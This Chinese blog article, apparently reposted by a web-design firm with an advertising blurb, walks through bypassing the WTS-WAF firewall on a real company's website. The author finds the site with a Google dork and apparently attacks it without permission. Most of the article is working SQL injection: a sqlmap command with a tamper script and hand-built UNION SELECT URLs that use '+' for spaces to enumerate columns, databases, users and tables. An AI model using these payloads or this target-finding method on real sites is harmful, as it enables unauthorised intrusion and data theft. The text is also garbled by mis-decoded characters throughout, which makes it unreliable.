本篇文章為大家展示了如何進(jìn)行繞過WTS-WAF的分析,內(nèi)容簡明扼要并且容易理解�,絕對(duì)能使你眼前一亮�����,通過這篇文章的詳細(xì)介紹希望你能有所收獲����。
創(chuàng)新互聯(lián)建站是一家集網(wǎng)站建設(shè),海城企業(yè)網(wǎng)站建設(shè),海城品牌網(wǎng)站建設(shè),網(wǎng)站定制,海城網(wǎng)站建設(shè)報(bào)價(jià),網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,海城網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)����,幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強(qiáng)企業(yè)競(jìng)爭力?��?沙浞譂M足這一群體相比中小企業(yè)更為豐富����、高端���、多元的互聯(lián)網(wǎng)需求��。同時(shí)我們時(shí)刻保持專業(yè)�����、時(shí)尚�����、前沿��,時(shí)刻以成就客戶成長自我��,堅(jiān)持不斷學(xué)習(xí)����、思考、沉淀�、凈化自己,讓我們?yōu)楦嗟钠髽I(yè)打造出實(shí)用型網(wǎng)站�。
0x01.尋找目標(biāo)
inurl:.php?id= intext:電器
找到了一個(gè)電器公司的網(wǎng)站,隨便測(cè)了測(cè)�����,發(fā)現(xiàn)有waf
這還不安排(找了點(diǎn)資料,貌似直接加號(hào)代替空格就可以����,直接嘗試)
0x02.操作
發(fā)現(xiàn)沒有waf攔截了
資料還說了
sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
工具我嘗試了發(fā)現(xiàn)無法開始
就這樣子......
0x03.手注
http://*/*.php?id=1+and+1=1 #回顯正常
http://*/*.php?id=1+and+1=2 #回顯錯(cuò)誤
說明存在注入
http://*/*.php?id=1+order+by+15 #15回顯錯(cuò)誤
http://*/*.php?id=1+order+by+14 #14回顯正常
說明有14個(gè)字段
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 #-1讓它錯(cuò)誤然后執(zhí)行后面
它回顯了第2和第8
http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14 #查詢當(dāng)前數(shù)據(jù)庫信息和當(dāng)前用戶
一些常見的函數(shù)
version() #顯示數(shù)據(jù)庫當(dāng)前版本
database() / schema() #顯示當(dāng)前數(shù)據(jù)庫名
user() / system_user() / session_user() / current_user() / current_user() #顯示當(dāng)前用戶名稱
charset(str) #返回字符串str的字符集
collation(str) #返回字符串str的字符排列方式
0x04.查數(shù)據(jù)
爆數(shù)據(jù)庫
http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
它不能group_concat,那我就一個(gè)一個(gè)查了�!
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #從1開始取一個(gè)
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1 #從2開始取一個(gè)
爆數(shù)據(jù)表
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
爆數(shù)據(jù)
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
總結(jié):
1.工具跑不起就只能手注了
2.實(shí)踐了下MySQL的手注
上述內(nèi)容就是如何進(jìn)行繞過WTS-WAF的分析,你們學(xué)到知識(shí)或技能了嗎����?如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道��。
網(wǎng)站名稱:如何進(jìn)行繞過WTS-WAF的分析
文章分享:
http://weahome.cn/article/ggcsse.html
重慶分公司
重慶分公司
